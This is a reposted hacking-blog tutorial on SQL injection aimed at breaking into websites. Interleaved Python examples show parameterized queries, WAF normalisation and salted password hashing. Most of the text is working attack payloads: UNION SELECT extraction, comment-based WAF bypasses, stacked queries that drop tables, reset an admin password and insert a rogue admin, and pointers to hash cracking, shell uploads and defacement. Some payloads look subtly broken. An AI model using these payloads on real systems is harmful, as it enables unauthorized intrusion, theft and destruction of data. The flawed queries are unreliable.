
Today I'll write a tutorial that covers most of the problems you run into while
applying SQL injection, and the solutions to them. Anyone who has looked for
tutorials on hacking a website has noticed that there are far too many SQL
injection tutorials. Almost every forum has 10 of them and every blog has 5, but
most of those tutorials are copied from somewhere else, and the author often
doesn't even know why SQL injection works. All of them read like textbooks that
stop at the ABCs, and the result is just a mess. Everyone writes tutorials about
SQL injection, but nobody covers the problems that come with the attack.
What is the cause of most problems related to SQL injection?
Web developers aren't always dumb. They have also heard of hackers and have
implemented security measures such as a WAF or manual protection. A WAF is a web
application firewall and is meant to block all malicious requests, but WAFs are
often quite easy to bypass. Nobody wants their site hacked, so site owners add
some security, but of course it would be wrong to say that when we fail it's the
server's fault. There's also a good chance that we're injecting differently than
we should.
A web application firewall (WAF) is an appliance, server plugin, or filter that
applies a set of rules to an HTTP conversation. Generally, these rules cover
common attacks such as Cross-site Scripting (XSS) and SQL Injection. By
customizing the rules to your application, many attacks can be identified and
blocked. The effort to perform this customization can be significant and needs
to be maintained as the application is modified.
If you're interested in WAFs and how they work, I suggest reading about them on
Wikipedia, http://en.wikipedia.org/wiki/Application_firewall, or at the Open Web
Application Security Project, also known as OWASP:
https://www.owasp.org/index.php/Web_Application_Firewall
Order by is being blocked?
It rarely happens, but sometimes you can't use ORDER BY because the WAF blocks it
or for some other reason. Unfortunately we can't skip that step, so we have to
find another way. The way is simple: instead of ORDER BY we use GROUP BY, because
that is much less likely to be blacklisted by the WAF.
If this request returns 'forbidden', then it is blocked:
http://site.com/gallery?id=1 order by 100--
Then try GROUP BY instead; it should come back fine:
http://site.com/gallery?id=1 group by 100-- / success
There's still a possibility that the WAF blocks that request too, but there is
one other way that isn't widely known. It works by comparing the main query
against (select 1):
http://example.org/news.php?id=8 and (select * from admins)=(select 1)
You'll probably receive an error like this: Operand should contain 5 column(s).
That error means there are 5 columns, so we can proceed to the next step, UNION
SELECT. The command was different than usual, but the injection itself is the
same.
http://site.com/news.php?id=-8 union select 1,2,3,4,5--
'order by 10000' and still no error?
In this short chapter I'll explain why ORDER BY sometimes doesn't work and you
don't see an error. The difference from the last chapter is that there your
requests were blocked by the WAF, whereas here the injection method itself is a
little different. When I first saw this I wondered how a database could have
100000 columns, because I wasn't getting the error while the site was vulnerable.
The answer is quite logical. With order by 1000000 we're not getting the error
because there are that many columns; we're not getting the error because our
injection isn't working at all.
Example : site.com/news.php?id=9 order by 10000000000-- [No Error]
To bypass this you just have to change the URL a little: add ' after the ID
number and + at the end.
Example :
site.com/news.php?id=9' order by 10000000--+[Error]
If the last example works for you, then you have to use the same form in the next
steps as well. This isn't complicated, but to make everything clear I'll still
give you an example.
http://site.com/news.php?id=-9' union select 1,2,3,4,5,6,7,8--+
Extracting data from other databases.
Sometimes the injection goes through without any errors, a hacker's perfect
dream. That dream ends the moment we see that nothing useful is there. There are
only a few tables, called "News", "gallery" and "articles". They aren't useful
at all because we'd like to see tables like "Admin" or "Administrator". Still,
the server probably has several databases, and even if we find the information
we're looking for, it's worth taking a look at the other databases as well.
This gives you the schema names:
site.com/news.php?id=9 union select 1,2,group_concat(schema_name),4 from information_schema.schemata
And with this you get the tables from a schema:
site.com/news.php?id=9 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=0x
This gives you the column names:
site.com/news.php?id=9 union select 1,2,group_concat(column_name),4 from information_schema.tables where table_schema=0x and table_name=0x
I get an error if I try to extract tables.
site.com/news.php?id=9 union select 1,2,group_concat(table_name),4 from information_schema.tables
Le wild Error appears.
"you have an error in your sql syntax near '' at line 1"
Change the URL to this:
site.com/news.php?id=9 union select 1,2,concat(unhex(hex(table_name),4 from information_schema.tables limit 0,1--
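The ORDER BY probe and the UNION SELECT extraction above both work for one reason: the id parameter is pasted into the statement text. The following is an added example, not code from the original article. It builds a constructed in-memory SQLite database with a "news" table and an "admins" table, runs the tutorial's two probes through a concatenating handler and through a validating, parameterized one, and reports what the database sees in each case.

```python
import sqlite3

# Constructed in-memory schema echoing the tutorial's "news" table and an
# "admins" table (sample rows, not data from the article).
def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO news VALUES (1, 'Welcome', 'First post');
        CREATE TABLE admins (id INTEGER, login_name TEXT, pw_hash TEXT);
        INSERT INTO admins VALUES (1, 'alice', 'constructed-hash-value');
    """)
    return conn

def news_vulnerable(conn, raw_id):
    # Concatenation: whatever is in the id parameter becomes SQL, so
    # "order by 100" and "union select" reach the parser as statements.
    return conn.execute(
        "SELECT title, body FROM news WHERE id = " + raw_id).fetchall()

def news_parameterized(conn, raw_id):
    # Validate the expected type, then bind the value. The driver sends it
    # separately from the statement text; it is compared, never parsed.
    if not raw_id.lstrip("-").isdigit():
        raise ValueError("id must be an integer")
    return conn.execute(
        "SELECT title, body FROM news WHERE id = ?", (int(raw_id),)).fetchall()

def probe(handler, raw_id):
    """Run one handler on a fresh DB; return rows or the exception class name."""
    conn = setup_db()
    try:
        return ("rows", handler(conn, raw_id))
    except Exception as exc:  # driver errors and validation errors alike
        return ("error", type(exc).__name__)
    finally:
        conn.close()

# The article's two probes, reused here as constructed inputs.
ORDER_BY_PROBE = "1 order by 100--"
UNION_PROBE = "-1 union select login_name, pw_hash from admins--"

if __name__ == "__main__":
    for name, fn in (("vulnerable", news_vulnerable),
                     ("parameterized", news_parameterized)):
        print(name, probe(fn, ORDER_BY_PROBE), probe(fn, UNION_PROBE))
```

The concatenating handler turns the ORDER BY probe into the column-count error the article relies on and the UNION probe into a row from the admins table, while the parameterized handler rejects both inputs before any SQL is executed.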
How to bypass a WAF/web application firewall
The biggest reason most problems occur is the security measures added to the
server, and the WAF in particular, but mostly they're of little use and can be
bypassed quite easily. Mostly you will get error 404 like the one below; this is
the WAF. People who are into SQL injection and bypassing WAFs are probably
thinking "Dude, only one bypassing method?", but we both know that bypassing
WAFs is a different kind of science and I could write an ebook on it. I'll
answer those bypassing questions another time.
"404 forbidden you do not have permission to access to this webpage"
The request looks like this if you get the error:
http://www.site.com/index.php?id=-1+union+select+1,2,3,4,5--
[Error]
Change the URL like below:
http://www.site.com/index.php?id=-1+/*!UnIoN*/+/*!sELeCt*/1,2,3,4,5--
[No error]
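The bypass above works because a rule that matches the literal text "union select" never sees it once the keywords are wrapped in MySQL version comments, which the database still executes. The following is an added example, not part of the original article or any real WAF's ruleset: a naive literal match beside a check that first normalises the query string the way the database will read it, run over constructed requests built from the two URLs above.

```python
import re

# Constructed sample query strings: the article's plain and comment-wrapped
# UNION SELECT forms plus a benign lookup (not captured from a real server).
SAMPLE_REQUESTS = [
    "/index.php?id=-1+union+select+1,2,3,4,5--",
    "/index.php?id=-1+/*!UnIoN*/+/*!sELeCt*/1,2,3,4,5--",
    "/index.php?id=42",
]

def naive_blocked(query):
    # What a weak rule does: decode the space encoding, lowercase, and look
    # for the keywords side by side. Comments between them defeat it.
    return "union select" in query.replace("+", " ").lower()

def normalize(query):
    """Canonicalise a query string into the text MySQL would actually parse."""
    q = query.replace("+", " ")                     # form encoding of a space
    q = re.sub(r"/\*!\d*", " ", q)                 # version-comment opener: body executes
    q = re.sub(r"/\*.*?\*/", " ", q, flags=re.S)   # ordinary comments: body dropped
    q = q.replace("*/", " ")                        # closers left over from /*! removal
    q = re.sub(r"\s+", " ", q)                      # collapse whitespace runs
    return q.lower().strip()

def normalized_blocked(query):
    # Match on the canonical form, so UnIoN/*!*/sELeCt and union select coincide.
    return re.search(r"\bunion\s+select\b", normalize(query)) is not None

def classify(requests=SAMPLE_REQUESTS):
    """Return (request, naive verdict, normalised verdict) for each request."""
    return [(r, naive_blocked(r), normalized_blocked(r)) for r in requests]

if __name__ == "__main__":
    for request, naive, normalized in classify():
        print(f"naive={naive!s:5} normalized={normalized!s:5} {request}")
```

Normalisation is only one layer: the robust fix is the parameterized query shown earlier, since a filter that has to anticipate every encoding trick will eventually miss one.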
Is it possible to modify the information in the database by SQL injection?
Most people aren't aware of it, but it's possible. You're able to UPDATE, DROP,
INSERT and SELECT information. Most people who deal with SQL injection have never
looked deeper into the attack than the average SQL injection tutorial shows, and
the average tutorial doesn't include those statements, most likely because most
people are copy-pasting tutorials or just rewriting them. You might ask why one
should update, drop or insert information into the database when you can just
read the existing information and use it: why create another Administrator
account if one already exists?
Reading information is just one part of the injection, and sometimes those other,
less talked about commands are more powerful than we think. If you have read all
the available SQL injection tutorials then you're probably aware that you can
read the information, but you may not have known that you can modify it. If you
have tried SQL injection then you have probably faced the problem that there isn't
an administrator account: why not use INSERT to add one? There isn't an admin
page to log in to: why not drop the table and all its information so nobody can
access it? You want to get rid of the current Administrator and can't change the
password: why not use UPDATE to change the Administrator's password?
You must have noticed that I have talked a lot about information you probably
think you don't need, but that's exactly what you need to learn and understand to
become a real hacker. You have to learn how SQL databases work in order to figure
out how those commands work, because you can't find tutorials about it on the
net. It's just like the math you learn in school: if you don't learn it, you'll
be in trouble when you grow up.
Theory is almost over, so let's get to the practice.
Let's say we're visiting this page and it's vulnerable to SQL injection:
http://site.com/news.php?id=1
You would have to start injecting to look at the tables and their columns, but
let's assume the current table is named "News".
With SQL injection you can SELECT, DROP, UPDATE and INSERT information in the
database. SELECT is already covered in all the tutorials, so let's focus on the
other three, starting with the DROP command.
I'd like to get rid of a table, how to do it?
http://site.com/news.php?id=1; DROP TABLE news
That seems easy: we have just dropped the table. I would explain what we did in
the above statement, but there is little to explain because everyone can
understand the command. Unfortunately most of the 'hackers' making tutorials on
SQL injection aren't aware of it, and sometimes these three words are more
important than all the information we can read in those tutorials.
Let's head to the next statement, UPDATE.
http://site.com/news.php?id=1; UPDATE 'Table name' SET 'data you want to edit' =
'new data' WHERE column_name='information'--
The template above might be confusing, so I'll add a query of the kind you're
most likely to use in real life:
http://site.com/news.php?id=1; UPDATE 'admin_login' SET 'password' = 'Crackhackforum' WHERE login_name='Rynaldo'--
We have just updated the Administrator account's password. In the above example
we updated the table called 'admin_login' and set the password to
"Crackhackforum" for the account with the username Rynaldo. It's a bit heavy to
explain, but I hope you'll understand.
How does INSERT work?
Luckily "INSERT" isn't as easy as the "DROP" statement, but it is still quite
understandable. Let's continue with Administrator privileges, because that's
what most people are after. Adding an administrator account would look like
this:
http://site.com/news.php?id=1; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (2,'Rynaldo','Crackhackforum','NA')--
INSERT INTO 'admin_login' means that we're inserting something into
'admin_login'. Next we have to tell the database exactly which information we
want to add: ('login_id', 'login_name', 'password', 'details'). That means the
fields we're filling are login_id, login_name, password and details, the
information the database needs to create a new account. So far we have told the
database what we want to add: a new account ID, username, password and details.
Now we have to tell it the values for the new account, VALUES
(2,'Rynaldo','Crackhackforum','NA')-- . That means the account ID is 2, the
username will be Rynaldo and the password of the account will be Crackhackforum.
Your new account has been added to the database, and all you have to do is open
the Administrator page and log in.
Passwords aren't working
Sometimes the site is vulnerable to SQL injection and you can get the passwords.
You find the site's username and password, but when you enter them into the
admin panel it shows a "Wrong password" error. This can happen because those
usernames and passwords are in the database but simply aren't in use. Sometimes
the site's admin does this deliberately to confuse you, and the control panel
doesn't actually accept any of those usernames and passwords. Sometimes accounts
are removed but still remain in the database. Sometimes it isn't the admin's
doing at all: the credentials were left behind after the login page was removed,
or the real credentials were moved to another database and the old entries were
never deleted.
Sometimes I get some weird password
This weird password is called a hash, and most likely it's an MD5 hash. That
means the site's admin has added more security to the website and has hashed the
passwords. The most popular choice is MD5. The best way to crack MD5 hashes is
with PasswordsPro or Hashcat, because they're the best and can crack the
password even if it's really hard or isn't MD5 at all. You can also use
http://md5decrypter.com. I don't like to be a person who nitpicks small details,
but here's a tip you should keep in mind. The domain says "md5decryptor", which
refers to decrypting MD5 hashes.
Actually it's not possible to decrypt a hash, because hashing is 'one-way'. One
way means the password can be turned into a hash, but the hash can't be turned
back into the password. Still, that doesn't mean we can't find out what the hash
stands for: we have to crack it. Hashes can't be decrypted, only cracked. Those
online sites aren't cracking hashes on every request either; they store already
cracked hashes and their results in a database, and if you ask about a hash that
is already in their database, you get the result. :)
An MD5 hash looks like this: 827ccb0eea8a706c4c34a16891f84e7b = 12345
You can read about all the hash types that exist and their descriptions here:
http://pastebin.com/aiyxhQsf
MD5 hashes can't be decrypted, only cracked.
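The lookup sites described above work exactly as the text says: they precompute hashes of candidate passwords and match the submitted hash against that table, which is why an unsalted MD5 of a common password is found instantly. The following is an added example, not code from the original article. It reproduces that table lookup on a constructed four-word list using the page's own 12345 hash, and beside it shows the storage format a defender should use instead, a per-user random salt with PBKDF2, under which two users with the same password get unrelated records and no precomputed table applies.

```python
import hashlib
import hmac
import os

# Constructed wordlist; a real lookup service holds hundreds of millions of entries.
WORDLIST = ["password", "12345", "letmein", "qwerty"]

def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()

def lookup_md5(target_hex, wordlist=WORDLIST):
    """Build hash->plaintext for every candidate and look the target up.
    Nothing is inverted; an unsalted hash is just a dictionary key."""
    table = {md5_hex(word): word for word in wordlist}
    return table.get(target_hex.lower())

def make_record(password, iterations=600_000, salt=None):
    """Salted, slow hash: the form a site should store instead of raw MD5.
    A fresh 16-byte salt per user defeats shared precomputed tables."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"

def verify_record(password, record):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    _, iterations, salt_hex, dk_hex = record.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)

if __name__ == "__main__":
    # The article's example hash: found by table lookup, not by decryption.
    print(lookup_md5("827ccb0eea8a706c4c34a16891f84e7b"))
    rec_a, rec_b = make_record("12345"), make_record("12345")
    print(rec_a.split("$")[3] == rec_b.split("$")[3])  # same password, different digests
    print(verify_record("12345", rec_a), verify_record("wrong", rec_a))
```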
How to find admin page of site?
Some sites don't have an admin control panel at all, which means you can use any
method you like to find the admin page, but it simply doesn't exist. You might
ask "I got the username and password from the database, so why isn't there an
admin login page?", but sometimes the credentials are just left in the database
after the control panel has been removed.
Most people use tools called "admin page finders". They have a fixed list of
pages and try each one. If a page gives HTTP response 200, it exists; if the
server responds with HTTP 404, the page doesn't exist. If a page from the list
exists, the tool reports "Page found". I don't have any tool to share at the
moment, but if you download one yourself, be careful, because those tools might
be infected with malware.
The admin page finders mentioned above usually don't find the administrator page
if it has been custom-made or renamed. That means quite often those tools don't
help us and we have to use an alternative, and I think the best one is a site
crawler. Most of you probably have Acunetix Web Vulnerability Scanner 8, and it
has one wonderful feature called the site crawler. It shows you all the pages on
the site and will find the login page if one exists.
Automated SQL injection tools.
Automated SQL injection tools are programs that do the whole job for you;
sometimes they will even crack the hashes and find the Administrator page. Most
people use automated SQL injection tools, and the most popular of them are Havij
and SQLmap. Havij is used far more than SQLmap even though the latter is the
much better tool for the job. The sad truth is that many people aren't even able
to run SQLmap, and those people are called script-kiddies. Being a script-kiddie
is the worst thing you can be in the hacking world, and if you never learn how to
perform the attack manually and only use tools, then you're one of them.
If you use those tools to perform the attack, then most people will think you're
a script-kiddie, because most likely you are. Professionals won't take you
seriously if you're injecting with them, and you won't become a real hacker
either.
My text above might raise the question "But I've seen that even professional
hackers use SQLmap?", and I'd like to say that everything isn't always black and
white. If there are 10 databases with 50 tables in them and 100 columns in each
table, it would take days to process all that information by hand. I also use
automated tools sometimes because they make my life easier, but to use those
tools you first have to learn how to do the work manually, and that's what the
tutorial above is teaching you.
Use automated tools only to make your life easier, but don't even look at them if
you don't know how to perform the attack manually.
What else can I do with SQL injection besides extracting information?
There are many things besides extracting information from the database, and
sometimes they are much more powerful. We have talked about how sometimes the
database doesn't contain the Administrator's credentials or you can't crack the
hashes. Then the whole injection seems pointless, because we can't use the
information we got from the database. Still, we can use other methods. Just as
we can conduct a CSRF attack through persistent XSS, we can also move on to other
attacks through SQL injection. One option would be performing a DOS attack on the
website that is vulnerable to SQL injection. DOS is short for Denial of Service,
and it's totally different from DDOS, Distributed Denial of Service. I think you
all know what these are, but to sum the attack up in a sentence, DOS lets us take
the website down temporarily so users won't have access to it. The other way
would be uploading a shell through SQL injection. If you're wondering what a
shell is: put shortly, it's a script that we upload to the server which creates a
backdoor for us and gives us the privileges to do what we like on the server;
sometimes, by uploading a shell, you have more rights to modify things than the
real Administrator has. After you have uploaded a shell you can move on to
symlinking, which means we can deface all the sites that share the same server.
Shelling the website is probably the most powerful thing you can do to it. I have
not covered how to upload a shell through SQL injection or how to cause a DOS
here, but I probably will in my next tutorials, because uploading a shell through
SQL injection is another kind of science, just like bypassing WAFs. Those are the
most common methods attackers turn to when they can't get anything useful out of
the database. We have all heard that imagination is unlimited and you can do
whatever you'd like. That's kind of true, and hacking is no exception: there are
more ways than I can count.
What to do if all the information doesn't display on the page?
I have rarely seen a case where there is so much information on the webpage
that it doesn't all fit, but one person recently asked me that question and I
decided to add it here. If you have questions, do ask and I'll update the
article. Getting back to the question, the answer is simple: if all the
information doesn't fit on the screen, look at the page source, because
everything displayed on the webpage is in there. Sometimes information also
appears in the browser tab where the site's name usually is. If you can't see
the information, then sometimes it's hidden, but by taking a deeper look you may
find it in the source. That's why you should always exhaust every option before
quitting, because sometimes you might think "I can't inject into that.." when
actually the answer is hidden in the source.
Source: http://www.rafayhackingarticles.net/2013/02/solutions-related-to-sql-injection.html